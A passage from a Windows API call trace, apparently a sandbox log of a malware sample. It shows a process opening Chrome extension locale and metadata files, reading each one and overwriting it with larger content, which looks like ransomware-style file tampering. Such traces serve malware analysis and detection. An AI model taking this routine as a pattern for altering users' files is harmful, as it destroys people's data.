dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0166.012] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0166.012] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xda [0166.012] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0166.012] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.012] ReleaseMutex (hMutex=0x168) returned 1 [0166.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0166.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0166.013] ReadFile (in: hFile=0x20c, lpBuffer=0x26c4e68, nNumberOfBytesToRead=0xda, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4e68*, lpNumberOfBytesRead=0x2d5f2bc*=0xda, lpOverlapped=0x0) returned 1 [0166.014] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0166.014] WriteFile (in: hFile=0x20c, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x662, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x662, lpOverlapped=0x0) returned 1 [0166.015] CloseHandle (hObject=0x20c) returned 1 [0166.015] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0166.016] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0166.016] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x11f [0166.016] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0166.016] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.017] ReleaseMutex (hMutex=0x168) returned 1 [0166.017] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0166.017] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7360c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0166.017] ReadFile (in: hFile=0x20c, lpBuffer=0x1ecd5c8, nNumberOfBytesToRead=0x11f, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ecd5c8*, lpNumberOfBytesRead=0x2d5f2bc*=0x11f, lpOverlapped=0x0) returned 1 [0166.018] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0166.018] WriteFile (in: hFile=0x20c, lpBuffer=0x2663f68*, nNumberOfBytesToWrite=0x6a7, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663f68*, lpNumberOfBytesWritten=0x2d5f2d0*=0x6a7, lpOverlapped=0x0) returned 1 [0166.019] CloseHandle (hObject=0x20c) returned 1 [0166.019] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0166.020] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0166.020] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x2bd5 [0166.020] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0166.020] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.020] ReleaseMutex (hMutex=0x168) returned 1 [0166.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="verified_contents.json", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0166.021] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="verified_contents.json", cchWideChar=22, lpMultiByteStr=0x1f88d34, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="verified_contents.json", lpUsedDefaultChar=0x0) returned 22 [0166.021] ReadFile (in: hFile=0x20c, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0166.440] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1bd5 [0166.440] ReadFile (in: hFile=0x20c, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0166.441] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1bd5 [0166.441] WriteFile (in: hFile=0x20c, lpBuffer=0x289d9d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x289d9d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0166.442] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0166.442] WriteFile (in: hFile=0x20c, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0166.443] CloseHandle (hObject=0x20c) returned 1 [0166.447] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0166.449] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0166.449] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xb3 [0166.449] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0166.449] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.449] ReleaseMutex (hMutex=0x168) returned 1 [0166.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0166.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0166.450] ReadFile (in: hFile=0x20c, lpBuffer=0x1f37998, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f37998*, lpNumberOfBytesRead=0x2d5f2bc*=0xb3, lpOverlapped=0x0) returned 1 [0166.451] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0166.452] WriteFile (in: hFile=0x20c, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x63b, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x63b, lpOverlapped=0x0) returned 1 [0166.452] CloseHandle (hObject=0x20c) returned 1 [0166.452] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0166.453] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0166.453] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xb3 [0166.454] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0166.454] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.454] ReleaseMutex (hMutex=0x168) returned 1 [0166.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0166.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7366c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0166.454] ReadFile (in: hFile=0x20c, lpBuffer=0x1f37998, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f37998*, lpNumberOfBytesRead=0x2d5f2bc*=0xb3, lpOverlapped=0x0) returned 1 [0166.455] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0166.456] WriteFile (in: hFile=0x20c, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x63b, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x63b, lpOverlapped=0x0) returned 1 [0166.456] CloseHandle (hObject=0x20c) returned 1 [0166.456] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0166.457] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0166.457] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xb3 [0166.458] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0166.458] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.458] ReleaseMutex (hMutex=0x168) returned 1 [0166.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0166.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0166.458] ReadFile (in: hFile=0x20c, lpBuffer=0x1f37998, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f37998*, lpNumberOfBytesRead=0x2d5f2bc*=0xb3, lpOverlapped=0x0) returned 1 [0166.459] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0166.460] WriteFile (in: hFile=0x20c, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x63b, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x63b, lpOverlapped=0x0) returned 1 [0166.460] CloseHandle (hObject=0x20c) returned 1 [0166.460] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0166.461] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0166.461] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xb3 [0166.462] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0166.462] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.462] ReleaseMutex (hMutex=0x168) returned 1 [0166.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0166.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7366c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0166.462] ReadFile (in: hFile=0x20c, lpBuffer=0x1f37998, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f37998*, lpNumberOfBytesRead=0x2d5f2bc*=0xb3, lpOverlapped=0x0) returned 1 [0166.463] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0166.464] WriteFile (in: hFile=0x20c, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x63b, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x63b, lpOverlapped=0x0) returned 1 [0166.464] CloseHandle (hObject=0x20c) returned 1 [0166.464] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0166.465] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0166.466] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xb3 [0166.466] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0166.466] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.466] ReleaseMutex (hMutex=0x168) returned 1 [0166.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0166.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0166.466] ReadFile (in: hFile=0x20c, lpBuffer=0x1f37998, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f37998*, lpNumberOfBytesRead=0x2d5f2bc*=0xb3, lpOverlapped=0x0) returned 1 [0166.468] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0166.468] WriteFile (in: hFile=0x20c, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x63b, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x63b, lpOverlapped=0x0) returned 1 [0166.469] CloseHandle (hObject=0x20c) returned 1 [0166.469] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0166.470] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0166.470] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xfe [0166.470] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0166.470] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.470] ReleaseMutex (hMutex=0x168) returned 1 [0166.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0166.470] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7366c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0166.471] ReadFile (in: hFile=0x20c, lpBuffer=0x1eea208, nNumberOfBytesToRead=0xfe, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eea208*, lpNumberOfBytesRead=0x2d5f2bc*=0xfe, lpOverlapped=0x0) returned 1 [0166.472] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0166.472] WriteFile (in: hFile=0x20c, lpBuffer=0x2873108*, nNumberOfBytesToWrite=0x686, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2873108*, lpNumberOfBytesWritten=0x2d5f2d0*=0x686, lpOverlapped=0x0) returned 1 [0166.472] CloseHandle (hObject=0x20c) returned 1 [0166.472] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_us\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0166.473] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0166.474] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xd5 [0166.474] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0166.474] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.474] ReleaseMutex (hMutex=0x168) returned 1 [0166.474] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0166.474] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0166.474] ReadFile (in: hFile=0x20c, lpBuffer=0x26c4b98, nNumberOfBytesToRead=0xd5, 